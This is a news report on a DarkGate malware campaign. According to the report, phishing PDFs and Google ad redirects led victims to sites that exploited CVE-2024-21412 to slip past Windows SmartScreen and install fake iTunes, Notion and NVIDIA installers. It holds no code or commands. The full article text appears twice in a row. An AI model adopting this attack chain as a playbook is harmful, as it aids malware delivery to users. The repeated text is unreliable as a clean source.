The SmartScreen security bug served hackers well. Maybe you also managed to become a victim of it?
In mid-January, security researchers noticed a new large-scale campaign to distribute malicious software DarkGate, exploiting a recently fixed vulnerability in the Microsoft Windows security system, and even before it was fixed, that is, in the Zero-day format.
According to Trend Micro, the attacks began with the use of PDF files containing open Google DoubleClick redirects that led victims to compromised sites. These sites exploited the CVE-2024-21412 vulnerability, which allows them to bypass Windows SmartScreen protection and install malicious installers that mimic popular iTunes, Notion, and NVIDIA applications distributed in the ".msi " format.
Vulnerability CVE-2024-21412, which has a CVSS score of 8.1, allows unauthorized attackers to bypass SmartScreen protection by using a specially created malicious file.
As noted above, Microsoft fixed this vulnerability as part of the February Patch Tuesday update package, but until then it was used not only to distribute DarkGate, but also to deliver the DarkMe malware used by the Water Hydra group. These attacks targeted financial institutions.
As for DarkGate, in this operation, hackers used CVE-2024-21412 in combination with redirects from Google Ads to spread malware. Victims click on a link from an attached PDF file obtained through a phishing email, which leads to downloading a malicious file that exploits the above vulnerability.
In addition to CVE-2024-21412, experts also recorded the use of another Windows SmartScreen vulnerability for delivering DarkGate-CVE-2023-36025 with a score of 8.8 on the CVSS scale, which was successfully exploited by hackers from TA544 back in November last year.
Security researchers emphasize the importance of vigilance and the need to avoid installing software from untrusted sources. This applies to both fake installers and the abuse of Google Ads technologies that allow attackers to scale their attacks.
In addition, experts note an increase in the number of new malware families capable of stealing confidential information, as well as an increase in the use of popular platforms for distributing malware, often with elements of social engineering.
The researchers findings highlight the complexity of ensuring the security of modern cyberspace and the need for an integrated approach to digital protection for both organizations and individual users.
In mid-January, security researchers noticed a new large-scale campaign to distribute malicious software DarkGate, exploiting a recently fixed vulnerability in the Microsoft Windows security system, and even before it was fixed, that is, in the Zero-day format.
According to Trend Micro, the attacks began with the use of PDF files containing open Google DoubleClick redirects that led victims to compromised sites. These sites exploited the CVE-2024-21412 vulnerability, which allows them to bypass Windows SmartScreen protection and install malicious installers that mimic popular iTunes, Notion, and NVIDIA applications distributed in the ".msi " format.
Vulnerability CVE-2024-21412, which has a CVSS score of 8.1, allows unauthorized attackers to bypass SmartScreen protection by using a specially created malicious file.
As noted above, Microsoft fixed this vulnerability as part of the February Patch Tuesday update package, but until then it was used not only to distribute DarkGate, but also to deliver the DarkMe malware used by the Water Hydra group. These attacks targeted financial institutions.
As for DarkGate, in this operation, hackers used CVE-2024-21412 in combination with redirects from Google Ads to spread malware. Victims click on a link from an attached PDF file obtained through a phishing email, which leads to downloading a malicious file that exploits the above vulnerability.
In addition to CVE-2024-21412, experts also recorded the use of another Windows SmartScreen vulnerability for delivering DarkGate-CVE-2023-36025 with a score of 8.8 on the CVSS scale, which was successfully exploited by hackers from TA544 back in November last year.
Security researchers emphasize the importance of vigilance and the need to avoid installing software from untrusted sources. This applies to both fake installers and the abuse of Google Ads technologies that allow attackers to scale their attacks.
In addition, experts note an increase in the number of new malware families capable of stealing confidential information, as well as an increase in the use of popular platforms for distributing malware, often with elements of social engineering.
The researchers findings highlight the complexity of ensuring the security of modern cyberspace and the need for an integrated approach to digital protection for both organizations and individual users.
